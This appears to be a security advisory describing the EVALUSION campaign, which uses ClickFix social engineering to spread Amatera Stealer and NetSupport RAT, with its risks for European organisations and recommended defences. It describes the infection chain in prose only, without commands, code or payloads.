The EVALUSION campaign, first observed in November 2025 and tracked by eSentire, employs the ClickFix social engineering technique to distribute two primary malware families: Amatera Stealer and NetSupport RAT. Amatera is a sophisticated evolution of the AcridRain (ACR) stealer, offered as malware-as-a-service (MaaS) with subscription pricing. It targets a broad range of sensitive data including cryptocurrency wallets, browser data, messaging applications, FTP clients, and email credentials. Amatera uses advanced evasion methods such as WoW64 SysCalls to bypass user-mode hooking by sandboxes, antivirus, and endpoint detection and response (EDR) tools. The infection vector involves social engineering users into executing malicious commands through the Windows Run dialog, which initiates a multi-step process: launching mshta.exe to run a PowerShell script that downloads a .NET DLL from MediaFire. This DLL, packed with PureCrypter (a C# crypter and loader), is injected into the MSBuild.exe process to harvest data. After data collection, Amatera contacts a command-and-control server to conditionally download and execute NetSupport RAT, a remote access trojan, but only if the infected machine is part of a domain or contains valuable files such as crypto wallets. This selective deployment indicates a focus on high-value targets. The campaign also includes phishing emails with Visual Basic Script attachments delivering other malware like XWorm, compromised websites redirecting to fake ClickFix CAPTCHA pages, and phishing kits (Cephas and Tycoon 2FA) that use obfuscation techniques to evade detection. The campaign’s use of legitimate Windows binaries and multi-stage payloads complicates detection and mitigation.

For European organizations, the EVALUSION campaign poses a significant risk of data theft, including credentials, financial information, and sensitive communications, especially for entities dealing with cryptocurrencies or operating domain-joined environments. The deployment of NetSupport RAT enables persistent remote access, potentially allowing attackers to move laterally, exfiltrate data, or deploy additional payloads. The advanced evasion techniques reduce the effectiveness of traditional endpoint defenses, increasing the likelihood of successful compromise. Organizations in finance, technology, and critical infrastructure sectors could face operational disruption, reputational damage, and regulatory consequences under GDPR due to data breaches. The selective targeting mechanism means that high-value targets within organizations are at particular risk, raising concerns for enterprises with valuable digital assets or complex IT environments.

European organizations should implement multi-layered defenses focusing on user education to recognize and resist social engineering tactics like ClickFix. Restrict or monitor the use of Windows Run dialog commands and mshta.exe execution through application whitelisting or endpoint protection policies. Employ advanced endpoint detection solutions capable of detecting process injection and anomalous PowerShell activity, including monitoring for WoW64 SysCalls usage. Block or closely monitor downloads from file hosting services such as MediaFire. Implement network segmentation and strict domain join policies to limit the spread and impact of RAT infections. Use multi-factor authentication (MFA) to reduce credential theft impact. Regularly audit and update email filtering and phishing detection systems to identify and block malicious attachments and links, including those using obfuscation techniques. Conduct threat hunting for indicators of compromise related to Amatera and NetSupport RAT, focusing on MSBuild.exe process anomalies and unusual outbound connections. Finally, maintain up-to-date backups and incident response plans tailored to malware and RAT infections.